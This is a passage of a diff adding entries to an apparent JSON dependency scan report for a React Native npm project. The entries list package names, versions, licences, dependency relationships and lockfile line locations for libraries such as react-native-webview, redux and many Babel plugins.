"pkg:npm/react-native-reanimated-carousel@4.0.3", + "UID": "bbd1dd0bfe45362a" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native-gesture-handler@2.28.0", + "react-native-reanimated@4.3.0", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18304, + "EndLine": 18315 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-responsive-screen@1.4.2", + "Name": "react-native-responsive-screen", + "Identifier": { + "PURL": "pkg:npm/react-native-responsive-screen@1.4.2", + "UID": "bfb71ad1353cbeb0" + }, + "Version": "1.4.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 18328, + "EndLine": 18336 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-safe-area-context@5.6.1", + "Name": "react-native-safe-area-context", + "Identifier": { + "PURL": "pkg:npm/react-native-safe-area-context@5.6.1", + "UID": "33785137571af435" + }, + "Version": "5.6.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18337, + "EndLine": 18346 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-screens@4.16.0", + "Name": "react-native-screens", + "Identifier": { + "PURL": "pkg:npm/react-native-screens@4.16.0", + "UID": "14e8c283d56cb3be" + }, + "Version": "4.16.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-freeze@1.0.4", + "react-native-is-edge-to-edge@1.3.1", + "react-native@0.81.0", + "react@19.1.0", + "warn-once@0.1.1" + ], + "Locations": [ + { + "StartLine": 18347, + "EndLine": 18361 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-send-intent@1.3.0", + "Name": "react-native-send-intent", + "Identifier": { + "PURL": "pkg:npm/react-native-send-intent@1.3.0", + "UID": "1cc4502a0e79a2a0" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 18362, + "EndLine": 18370 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-share@12.2.6", + "Name": "react-native-share", + "Identifier": { + "PURL": "pkg:npm/react-native-share@12.2.6", + "UID": "4b1b3030d3ed0430" + }, + "Version": "12.2.6", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 18371, + "EndLine": 18379 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-snackbar@2.9.0", + "Name": "react-native-snackbar", + "Identifier": { + "PURL": "pkg:npm/react-native-snackbar@2.9.0", + "UID": "44aabf2724d24b3e" + }, + "Version": "2.9.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18380, + "EndLine": 18389 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-snap-carousel@3.9.1", + "Name": "react-native-snap-carousel", + "Identifier": { + "PURL": "pkg:npm/react-native-snap-carousel@3.9.1", + "UID": "4b04a9d53d952426" + }, + "Version": "3.9.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Relationship": "direct", + "DependsOn": [ + "prop-types@15.8.1", + "react-addons-shallow-compare@15.6.2", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18390, + "EndLine": 18403 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-splash-screen@3.3.0", + "Name": "react-native-splash-screen", + "Identifier": { + "PURL": "pkg:npm/react-native-splash-screen@3.3.0", + "UID": "9e834776813a7724" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 18404, + "EndLine": 18412 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-sqlite-2@3.6.2", + "Name": "react-native-sqlite-2", + "Identifier": { + "PURL": "pkg:npm/react-native-sqlite-2@3.6.2", + "UID": "fac149fc14606bf9" + }, + "Version": "3.6.2", + "Licenses": [ + "Apache-2.0" + ], + "Relationship": "direct", + "DependsOn": [ + "lodash.map@4.6.0", + "lodash.zipobject@4.1.3", + "react-native@0.81.0", + "websql@2.0.3" + ], + "Locations": [ + { + "StartLine": 18413, + "EndLine": 18426 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-svg@15.14.0", + "Name": "react-native-svg", + "Identifier": { + "PURL": "pkg:npm/react-native-svg@15.14.0", + "UID": "d08db966c978b367" + }, + "Version": "15.14.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "css-select@5.2.2", + "css-tree@1.1.3", + "react-native@0.81.0", + "react@19.1.0", + "warn-once@0.1.1" + ], + "Locations": [ + { + "StartLine": 18427, + "EndLine": 18441 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-svg-transformer@1.5.1", + "Name": "react-native-svg-transformer", + "Identifier": { + "PURL": "pkg:npm/react-native-svg-transformer@1.5.1", + "UID": "6c8ac75091a8cd03" + }, + "Version": "1.5.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@svgr/core@8.1.0", + "@svgr/plugin-jsx@8.1.0", + "@svgr/plugin-svgo@8.1.0", + "path-dirname@1.0.2", + "react-native-svg@15.14.0", + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 18442, + "EndLine": 18457 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-tab-view@4.3.0", + "Name": "react-native-tab-view", + "Identifier": { + "PURL": "pkg:npm/react-native-tab-view@4.3.0", + "UID": "cb41ef7e84f2c21a" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native-pager-view@8.0.0", + "react-native@0.81.0", + "react@19.1.0", + "use-latest-callback@0.2.5" + ], + "Locations": [ + { + "StartLine": 18458, + "EndLine": 18471 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-tts@4.1.1", + "Name": "react-native-tts", + "Identifier": { + "PURL": "pkg:npm/react-native-tts@4.1.1", + "UID": "abddb07f73bfe419" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 18472, + "EndLine": 18477 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-vector-icons@10.3.0", + "Name": "react-native-vector-icons", + "Identifier": { + "PURL": "pkg:npm/react-native-vector-icons@10.3.0", + "UID": "31b24ef176641c5a" + }, + "Version": "10.3.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "prop-types@15.8.1", + "yargs@16.2.0" + ], + "Locations": [ + { + "StartLine": 18478, + "EndLine": 18494 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-video@6.17.0", + "Name": "react-native-video", + "Identifier": { + "PURL": "pkg:npm/react-native-video@6.17.0", + "UID": "a1d8cc6e64474f6c" + }, + "Version": "6.17.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18533, + "EndLine": 18542 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-video-controls@2.8.1", + "Name": "react-native-video-controls", + "Identifier": { + "PURL": "pkg:npm/react-native-video-controls@2.8.1", + "UID": "6000ecc3f56fa72f" + }, + "Version": "2.8.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "lodash@4.17.21", + "react-native-video@6.17.0", + "react-native@0.81.0" + ], + "Locations": [ + { + "StartLine": 18543, + "EndLine": 18555 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-view-shot@4.0.3", + "Name": "react-native-view-shot", + "Identifier": { + "PURL": "pkg:npm/react-native-view-shot@4.0.3", + "UID": "c78ff2ac9b87dbe7" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "html2canvas@1.4.1", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18556, + "EndLine": 18568 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-vision-camera@4.7.2", + "Name": "react-native-vision-camera", + "Identifier": { + "PURL": "pkg:npm/react-native-vision-camera@4.7.2", + "UID": "ac4c695e7aad703" + }, + "Version": "4.7.2", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native-reanimated@4.3.0", + "react-native-worklets-core@1.6.3", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18569, + "EndLine": 18592 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-vision-camera-v3-image-labeling@1.5.0", + "Name": "react-native-vision-camera-v3-image-labeling", + "Identifier": { + "PURL": "pkg:npm/react-native-vision-camera-v3-image-labeling@1.5.0", + "UID": "e9d5cf41ce633f39" + }, + "Version": "1.5.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native-vision-camera@4.7.2", + "react-native-worklets-core@1.6.3", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18593, + "EndLine": 18607 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-webview@13.16.0", + "Name": "react-native-webview", + "Identifier": { + "PURL": "pkg:npm/react-native-webview@13.16.0", + "UID": "58f67900ce92a616" + }, + "Version": "13.16.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "escape-string-regexp@4.0.0", + "invariant@2.2.4", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18608, + "EndLine": 18621 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-worklets@0.8.1", + "Name": "react-native-worklets", + "Identifier": { + "PURL": "pkg:npm/react-native-worklets@0.8.1", + "UID": "5c581c3aa228029f" + }, + "Version": "0.8.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/plugin-transform-arrow-functions@7.27.1", + "@babel/plugin-transform-class-properties@7.27.1", + "@babel/plugin-transform-classes@7.28.4", + "@babel/plugin-transform-nullish-coalescing-operator@7.27.1", + "@babel/plugin-transform-optional-chaining@7.27.1", + "@babel/plugin-transform-shorthand-properties@7.27.1", + "@babel/plugin-transform-template-literals@7.27.1", + "@babel/plugin-transform-unicode-regex@7.27.1", + "@babel/preset-typescript@7.27.1", + "@react-native/metro-config@0.81.0", + "convert-source-map@2.0.0", + "react-native@0.81.0", + "react@19.1.0", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 18622, + "EndLine": 18646 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-native-worklets-core@1.6.3", + "Name": "react-native-worklets-core", + "Identifier": { + "PURL": "pkg:npm/react-native-worklets-core@1.6.3", + "UID": "7a7f1a1c040b5ce8" + }, + "Version": "1.6.3", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "react-native@0.81.0", + "react@19.1.0", + "string-hash-64@1.0.3" + ], + "Locations": [ + { + "StartLine": 18647, + "EndLine": 18659 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "react-redux@9.2.0", + "Name": "react-redux", + "Identifier": { + "PURL": "pkg:npm/react-redux@9.2.0", + "UID": "93eda534c90013c4" + }, + "Version": "9.2.0", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "DependsOn": [ + "@types/react@19.2.2", + "@types/use-sync-external-store@0.0.6", + "react@19.1.0", + "redux@5.0.1", + "use-sync-external-store@1.6.0" + ], + "Locations": [ + { + "StartLine": 18716, + "EndLine": 18738 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "redux@5.0.1", + "Name": "redux", + "Identifier": { + "PURL": "pkg:npm/redux@5.0.1", + "UID": "234dff8f52037b3e" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 18925, + "EndLine": 18930 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "typescript@5.9.3", + "Name": "typescript", + "Identifier": { + "PURL": "pkg:npm/typescript@5.9.3", + "UID": "360e634d66908973" + }, + "Version": "5.9.3", + "Licenses": [ + "Apache-2.0" + ], + "Relationship": "direct", + "Locations": [ + { + "StartLine": 20858, + "EndLine": 20871 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/code-frame@7.10.4", + "Name": "@babel/code-frame", + "Identifier": { + "PURL": "pkg:npm/%40babel/code-frame@7.10.4", + "UID": "e825496a42b09641" + }, + "Version": "7.10.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/highlight@7.25.9" + ], + "Locations": [ + { + "StartLine": 2386, + "EndLine": 2394 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/code-frame@7.27.1", + "Name": "@babel/code-frame", + "Identifier": { + "PURL": "pkg:npm/%40babel/code-frame@7.27.1", + "UID": "b9d8e33eaa00ceb6" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-validator-identifier@7.27.1", + "js-tokens@4.0.0", + "picocolors@1.1.1" + ], + "Locations": [ + { + "StartLine": 139, + "EndLine": 152 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/compat-data@7.28.4", + "Name": "@babel/compat-data", + "Identifier": { + "PURL": "pkg:npm/%40babel/compat-data@7.28.4", + "UID": "1fb4a28eda012654" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 153, + "EndLine": 161 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/generator@7.28.3", + "Name": "@babel/generator", + "Identifier": { + "PURL": "pkg:npm/%40babel/generator@7.28.3", + "UID": "44621a8289c9fba6" + }, + "Version": "7.28.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/parser@7.28.4", + "@babel/types@7.28.4", + "@jridgewell/gen-mapping@0.3.13", + "@jridgewell/trace-mapping@0.3.31", + "jsesc@3.1.0" + ], + "Locations": [ + { + "StartLine": 211, + "EndLine": 226 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-annotate-as-pure@7.27.3", + "Name": "@babel/helper-annotate-as-pure", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-annotate-as-pure@7.27.3", + "UID": "4dac1ff08722cc3f" + }, + "Version": "7.27.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 227, + "EndLine": 238 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-compilation-targets@7.27.2", + "Name": "@babel/helper-compilation-targets", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-compilation-targets@7.27.2", + "UID": "bf9815df8b4b44d3" + }, + "Version": "7.27.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/compat-data@7.28.4", + "@babel/helper-validator-option@7.27.1", + "browserslist@4.26.3", + "lru-cache@5.1.1", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 239, + "EndLine": 254 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-create-class-features-plugin@7.28.3", + "Name": "@babel/helper-create-class-features-plugin", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-create-class-features-plugin@7.28.3", + "UID": "c3184142ca73d1" + }, + "Version": "7.28.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-annotate-as-pure@7.27.3", + "@babel/helper-member-expression-to-functions@7.27.1", + "@babel/helper-optimise-call-expression@7.27.1", + "@babel/helper-replace-supers@7.27.1", + "@babel/helper-skip-transparent-expression-wrappers@7.27.1", + "@babel/traverse@7.28.4", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 255, + "EndLine": 275 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-create-regexp-features-plugin@7.27.1", + "Name": "@babel/helper-create-regexp-features-plugin", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-create-regexp-features-plugin@7.27.1", + "UID": "18f7f7bcdd672460" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-annotate-as-pure@7.27.3", + "regexpu-core@6.4.0", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 276, + "EndLine": 292 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-define-polyfill-provider@0.6.5", + "Name": "@babel/helper-define-polyfill-provider", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-define-polyfill-provider@0.6.5", + "UID": "3572af4f921cfe1e" + }, + "Version": "0.6.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-compilation-targets@7.27.2", + "@babel/helper-plugin-utils@7.27.1", + "debug@4.4.3", + "lodash.debounce@4.0.8", + "resolve@1.22.10" + ], + "Locations": [ + { + "StartLine": 293, + "EndLine": 308 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-globals@7.28.0", + "Name": "@babel/helper-globals", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-globals@7.28.0", + "UID": "341c17d8edbdbddd" + }, + "Version": "7.28.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 309, + "EndLine": 317 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-member-expression-to-functions@7.27.1", + "Name": "@babel/helper-member-expression-to-functions", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-member-expression-to-functions@7.27.1", + "UID": "69c0a3a6166a4ba6" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/traverse@7.28.4", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 318, + "EndLine": 330 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-module-imports@7.27.1", + "Name": "@babel/helper-module-imports", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-module-imports@7.27.1", + "UID": "7066e6d04254ba4c" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/traverse@7.28.4", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 331, + "EndLine": 343 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-module-transforms@7.28.3", + "Name": "@babel/helper-module-transforms", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-module-transforms@7.28.3", + "UID": "2eb8aa43d3876a3c" + }, + "Version": "7.28.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-module-imports@7.27.1", + "@babel/helper-validator-identifier@7.27.1", + "@babel/traverse@7.28.4" + ], + "Locations": [ + { + "StartLine": 344, + "EndLine": 360 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-optimise-call-expression@7.27.1", + "Name": "@babel/helper-optimise-call-expression", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-optimise-call-expression@7.27.1", + "UID": "22b8065609d21e1f" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 361, + "EndLine": 372 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-plugin-utils@7.27.1", + "Name": "@babel/helper-plugin-utils", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-plugin-utils@7.27.1", + "UID": "ae35ce14a335f2ef" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 373, + "EndLine": 381 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-remap-async-to-generator@7.27.1", + "Name": "@babel/helper-remap-async-to-generator", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-remap-async-to-generator@7.27.1", + "UID": "e6f80da9a1325482" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-annotate-as-pure@7.27.3", + "@babel/helper-wrap-function@7.28.3", + "@babel/traverse@7.28.4" + ], + "Locations": [ + { + "StartLine": 382, + "EndLine": 398 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-replace-supers@7.27.1", + "Name": "@babel/helper-replace-supers", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-replace-supers@7.27.1", + "UID": "8b6ed2d0bfc05e64" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-member-expression-to-functions@7.27.1", + "@babel/helper-optimise-call-expression@7.27.1", + "@babel/traverse@7.28.4" + ], + "Locations": [ + { + "StartLine": 399, + "EndLine": 415 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-skip-transparent-expression-wrappers@7.27.1", + "Name": "@babel/helper-skip-transparent-expression-wrappers", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-skip-transparent-expression-wrappers@7.27.1", + "UID": "4b9b027d36fee93b" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/traverse@7.28.4", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 416, + "EndLine": 428 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-string-parser@7.27.1", + "Name": "@babel/helper-string-parser", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-string-parser@7.27.1", + "UID": "d00ff65b3b5bf173" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 429, + "EndLine": 437 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-validator-identifier@7.27.1", + "Name": "@babel/helper-validator-identifier", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-validator-identifier@7.27.1", + "UID": "a7c7d00a2fb7f604" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 438, + "EndLine": 446 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-validator-option@7.27.1", + "Name": "@babel/helper-validator-option", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-validator-option@7.27.1", + "UID": "4a4b649d45522d62" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 447, + "EndLine": 455 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helper-wrap-function@7.28.3", + "Name": "@babel/helper-wrap-function", + "Identifier": { + "PURL": "pkg:npm/%40babel/helper-wrap-function@7.28.3", + "UID": "c2ab0566b37a5752" + }, + "Version": "7.28.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/template@7.27.2", + "@babel/traverse@7.28.4", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 456, + "EndLine": 469 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/helpers@7.28.4", + "Name": "@babel/helpers", + "Identifier": { + "PURL": "pkg:npm/%40babel/helpers@7.28.4", + "UID": "3c2db9a6648eea62" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/template@7.27.2", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 470, + "EndLine": 482 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/highlight@7.25.9", + "Name": "@babel/highlight", + "Identifier": { + "PURL": "pkg:npm/%40babel/highlight@7.25.9", + "UID": "3edb21cca92ecea8" + }, + "Version": "7.25.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-validator-identifier@7.27.1", + "chalk@2.4.2", + "js-tokens@4.0.0", + "picocolors@1.1.1" + ], + "Locations": [ + { + "StartLine": 483, + "EndLine": 497 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/parser@7.28.4", + "Name": "@babel/parser", + "Identifier": { + "PURL": "pkg:npm/%40babel/parser@7.28.4", + "UID": "41ade695d8989ffd" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 569, + "EndLine": 583 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-proposal-export-default-from@7.27.1", + "Name": "@babel/plugin-proposal-export-default-from", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-proposal-export-default-from@7.27.1", + "UID": "8ac0d6e80d9158dd" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 668, + "EndLine": 682 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-async-generators@7.8.4", + "Name": "@babel/plugin-syntax-async-generators", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-async-generators@7.8.4", + "UID": "3bc405b13deb38e9" + }, + "Version": "7.8.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 696, + "EndLine": 707 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-bigint@7.8.3", + "Name": "@babel/plugin-syntax-bigint", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-bigint@7.8.3", + "UID": "cd46640de32c6b1" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 708, + "EndLine": 719 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-class-properties@7.12.13", + "Name": "@babel/plugin-syntax-class-properties", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-class-properties@7.12.13", + "UID": "4c758f7ad88e8c83" + }, + "Version": "7.12.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 720, + "EndLine": 731 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-class-static-block@7.14.5", + "Name": "@babel/plugin-syntax-class-static-block", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-class-static-block@7.14.5", + "UID": "8ba30823ef0e4351" + }, + "Version": "7.14.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 732, + "EndLine": 746 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-dynamic-import@7.8.3", + "Name": "@babel/plugin-syntax-dynamic-import", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-dynamic-import@7.8.3", + "UID": "70d70d9e6b7c0bc0" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 747, + "EndLine": 758 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@babel/plugin-syntax-export-default-from@7.27.1", + "Name": "@babel/plugin-syntax-export-default-from", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-export-default-from@7.27.1", + "UID": "2319e75330626f6b" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 759, + "EndLine": 773 + } + ], + "AnalyzedBy": 